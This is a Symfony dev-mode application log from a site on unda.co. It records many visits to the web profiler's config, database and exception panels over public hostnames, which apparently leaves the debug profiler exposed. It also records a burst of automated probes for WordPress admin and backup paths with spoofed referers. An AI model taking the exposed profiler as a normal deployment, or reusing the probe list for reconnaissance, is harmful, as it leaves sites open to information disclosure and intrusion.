[2025-12-19 23:00:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 23:04:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
[2025-12-19 23:04:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 23:10:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aae23e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aae23e","method":"GET"} []
[2025-12-19 23:10:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 23:12:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 23:17:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 23:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759d74","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/759d74?panel=db","method":"GET"} []
[2025-12-19 23:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 23:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4d9f23","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4d9f23?panel=swiftmailer","method":"GET"} []
[2025-12-19 23:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 23:36:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"ddce90","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/ddce90/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-19 23:36:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-19 23:42:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c98e4d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c98e4d?panel=exception","method":"GET"} []
[2025-12-19 23:42:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 23:49:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 23:53:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 23:53:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 23:53:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 23:53:11] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 23:53:11] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 23:53:11] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 23:53:11] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 23:54:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 23:54:12] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 23:54:12] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 23:54:12] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 23:54:12] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 23:54:12] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 23:54:12] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 23:54:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1fcc47","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1fcc47?panel=db","method":"GET"} []
[2025-12-19 23:54:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 23:55:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=exception","method":"GET"} []
[2025-12-19 23:55:07] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"5f0320","_route":"_profiler_exception_css"},"request_uri":"https://www.unda.co/_profiler/5f0320/exception.css","method":"GET"} []
[2025-12-19 23:55:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 23:55:07] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"5f0320","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/5f0320/exception","method":"GET"} []
[2025-12-19 23:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"836ec4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/836ec4?group=1&panel=db","method":"GET"} []
[2025-12-19 23:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-19 23:58:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
[2025-12-19 23:58:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 23:58:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=validator","method":"GET"} []
[2025-12-19 23:58:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 00:00:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8d946f","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/8d946f?panel=time","method":"GET"} []
[2025-12-20 00:00:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 00:01:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/uploads"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/uploads\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:07:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:07:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:07:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:07:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:08:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:23:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=time","method":"GET"} []
[2025-12-20 00:23:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 00:25:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 00:26:36] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1877a1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/1877a1/search/results?ip=189.172.122.247&limit=10&method=GET","method":"GET"} []
[2025-12-20 00:26:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.122.247&limit=10&method=GET","method":"GET"} []
[2025-12-20 00:26:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"384a6d","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/384a6d/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 00:26:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 00:27:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f66ec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f66ec6?panel=db","method":"GET"} []
